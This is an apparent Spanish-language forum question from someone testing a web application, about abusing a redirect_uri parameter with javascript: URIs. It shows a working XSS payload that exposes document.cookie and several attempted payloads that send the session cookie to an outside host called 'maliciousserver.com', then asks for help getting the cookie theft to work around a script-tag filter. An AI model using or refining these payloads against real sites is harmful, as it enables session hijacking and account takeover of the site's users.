Estoy probando una aplicación web y encontré que url contiene "redirect=" donde navega a una nueva ubicación una vez que ha iniciado sesión.
http://IPAddress/?redirect_uri=test
Estoy intentando explotar la cookie usando redirect_uri como HTTPOnly & Las banderas de seguridad no están establecidas.
He intentado diferentes cargas útiles y he explotado con éxito utilizando la siguiente carga útil
http://IPAddress/?redirect_uri=javascript:alert(document.cookie)
Ahora quiero transferir la carga útil a otro servidor malicioso, para eso he intentado seguir las cargas útiles, pero nada funciona.
http://IPAddress/?redirect_uri=javascript:document.location.href="http://maliciousserver.com/anyfile.php?cookie=" + document.cookie
La carga útil anterior ni siquiera envía la solicitud al servidor malintencionado, mientras que la solicitud HTTP se recibió para la siguiente carga útil
http://IPAddress/?redirect_uri=javascript:document.location.href="http://maliciousserver.com/anyfile.php?cookie="
¿Podría alguien ayudarme a transferir la cookie utilizando redirect_uri=javascript: payload a otro servidor?
P.S - Las etiquetas <script> </script> no se ejecutan porque el encabezado x-xss-protection está habilitado.